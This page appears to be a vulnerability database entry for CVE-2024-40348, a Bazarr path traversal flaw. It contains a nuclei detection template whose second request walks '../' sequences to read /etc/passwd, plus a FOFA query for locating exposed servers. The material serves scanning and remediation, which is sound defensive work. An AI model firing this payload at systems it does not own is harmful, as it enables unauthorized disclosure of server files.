Lucene search
K

Bazarr < 1.4.3 - Arbitrary File Read

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 65 Views

Bazarr < 1.4.3 - Arbitrary File Read vulnerability, High severit

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Bazarr
21 Jul 202400:54
githubexploit
GithubExploit
Exploit for Path Traversal in Bazarr
20 Dec 202409:47
githubexploit
Circl
CVE-2024-40348
20 Jul 202407:15
circl
CNNVD
Bazarr 安全漏洞
20 Jul 202400:00
cnnvd
CNVD
Bazarr Arbitrary File Read Vulnerability
23 Jul 202400:00
cnvd
CVE
CVE-2024-40348
20 Jul 202400:00
cve
Cvelist
CVE-2024-40348
20 Jul 202400:00
cvelist
NVD
CVE-2024-40348
20 Jul 202404:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
openvas
Positive Technologies
PT-2024-28817 · Bazaar · Bazaar
20 Jul 202400:00
ptsecurity
Rows per page
id: CVE-2024-40348

info:
  name: Bazarr < 1.4.3 - Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Bazarr server via path traversal.
  remediation: |
    Update Bazarr to version 1.4.4 or later.
  reference:
    - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
    - https://www.bazarr.media/
    - https://github.com/bigb0x/CVE-2024-40348
  classification:
    cve-id: CVE-2024-40348
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
    cvss-score: 8.2
    epss-score: 0.0829
    epss-percentile: 0.94235
    cpe: cpe:2.3:a:bazarr:bazarr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: morpheus65535
    product: bazarr
    fofa-query: title=="Bazarr" && icon_hash="-1983413099"
  tags: cve,cve2024,bazarr,lfi,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login"

    matchers:
      - type: word
        part: body
        words:
          - "<title>Bazarr</title>"
          - 'content="Bazarr'
          - "window.Bazarr"
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 490a004630440220510b8994c8d993d4863284bf0ca0028d5c0b2429167ab19d6e2e60cf2bc5e16c02204730b221aa4f124563ad4f90afb3fb3ae2340fe50477269460a4a2a6d0cf718e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.18.2
EPSS0.0829
SSVC
65